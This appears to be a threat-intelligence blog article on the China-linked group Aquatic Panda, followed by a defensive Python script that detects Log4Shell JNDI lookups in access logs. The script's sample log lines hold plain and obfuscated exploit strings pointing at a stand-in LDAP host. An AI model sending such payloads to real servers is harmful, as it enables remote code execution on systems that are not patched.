China's Malware Targets Global Victims

As cyber threats continue to evolve, you might want to pay attention to Aquatic Panda, a China-linked advanced persistent threat (APT) group that’s been active since at least 2019. Known by several aliases such as Bronze University and Earth Lusca, this group operates under the Winnti Group umbrella and is funded by Chinese intelligence. Their primary focus? Espionage and intelligence collection against a variety of global targets, including governments and NGOs.

Aquatic Panda employs a suite of sophisticated malware strains to carry out their operations. One of the most common is ShadowPad, a versatile implant also associated with other China-aligned actors. Another significant tool in their arsenal is SodaMaster, which was originally linked to APT10 but has since spread among multiple groups. They also utilize Spyder and RPipeCommander, the latter being a reverse shell specifically deployed against governmental organizations. Then there’s ScatterBee, a loader that drops additional malware onto infected systems. Each of these tools serves a particular purpose, contributing to their overall espionage objectives.

Aquatic Panda utilizes advanced malware like ShadowPad and SodaMaster to enhance their espionage operations.

Geographically, Aquatic Panda’s reach spans numerous countries, including Taiwan, Hungary, Turkey, Thailand, France, and the United States. Their recent Operation FishMedley showcased their capability, targeting seven organizations over ten months, including Catholic charities and non-governmental organizations. This highlights their focus on sectors that often hold sensitive information and influence. Their primary objective is to access intellectual property related to the telecom and technology sectors.

The techniques and tactics employed by Aquatic Panda are equally concerning. They gain initial access through techniques such as DNS poisoning and exploitation of the Log4Shell vulnerability, although the exact methods can be elusive. Once inside, they use implants for data theft and reconnaissance, employing tools like Cobalt Strike for remote access. Their evasion strategies are sophisticated, often abusing native OS binaries (living off the land) to avoid detection.

In response to these persistent threats, various law enforcement agencies have managed to disrupt some of Aquatic Panda’s attacks. However, organizations must remain vigilant, patching vulnerabilities and continuously monitoring their systems to detect potential breaches early. International cooperation is crucial in combating such threats, as is public awareness. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued advisories to alert businesses about the risks posed by Aquatic Panda and similar groups.
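The article names Log4Shell as one of the group’s initial-access routes and recommends continuous monitoring to catch breaches early. As an added example (not code from the article or from any vendor advisory), the script below scans web-server access log lines for Log4Shell-style JNDI lookup strings, first undoing the common obfuscation tricks (percent-encoding, `${lower:…}`/`${upper:…}` wrappers and the `${…:-x}` default-value trick) so that disguised payloads are caught as well as plain ones. The log lines and the 203.0.113.7 address are constructed test data, not indicators from the article.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not taken from the article.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:09 +0000] "GET /api?x=${${lower:j}${lower:n}di:${::-l}dap://203.0.113.7/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.3 - - [12/Dec/2021:10:02:00 +0000] "GET /docs HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0)"',
    '10.0.0.9 - - [12/Dec/2021:10:02:31 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fc%7D HTTP/1.1" 200 40 "-" "python-requests/2.25"',
]

# Innermost ${...} token: no nested braces inside.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")

# The lookup that Log4Shell (CVE-2021-44228) abuses, with the protocols seen in the wild.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://", re.IGNORECASE)


def _resolve(token: str) -> str:
    """Collapse one obfuscation wrapper; leave anything else untouched."""
    head, sep, tail = token.partition(":")
    key = head.lower()
    if key == "lower" and sep:          # ${lower:J} -> j
        return tail.lower()
    if key == "upper" and sep:          # ${upper:j} -> J
        return tail.upper()
    if ":-" in token:                   # ${::-x} or ${env:NOPE:-x} -> x
        return token.split(":-", 1)[1]
    return "${" + token + "}"           # a real lookup such as ${jndi:...}: keep it


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Percent-decode, then peel nested wrappers from the inside out until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def detect_jndi(line: str) -> Optional[Dict[str, object]]:
    """Return a finding if the line carries a JNDI lookup after normalization, else None."""
    normalized = normalize_lookups(line)
    match = JNDI_LOOKUP.search(normalized)
    if not match:
        return None
    return {
        "protocol": match.group(1).lower(),
        # True when the raw line hid the lookup behind encoding or wrappers.
        "obfuscated": JNDI_LOOKUP.search(line) is None,
        "normalized": normalized,
        "raw": line,
    }


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan every line and attach a 1-based line number to each finding."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        finding = detect_jndi(line)
        if finding:
            finding["line_no"] = line_no
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG_LINES):
        flag = "obfuscated" if hit["obfuscated"] else "plain"
        print(f"line {hit['line_no']}: {hit['protocol']} lookup ({flag}) -> {hit['normalized']}")
```

Matching on the normalized text rather than the raw line is the point of the example: a rule that only looks for the literal `${jndi:` misses the second and third payload variants above. In production the same logic would be fed from the web server’s log pipeline, and any hit should trigger a check that the Log4j instances behind that endpoint are patched.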

In a world where cyber threats are becoming increasingly complex, staying informed about groups like Aquatic Panda can be your first line of defense.
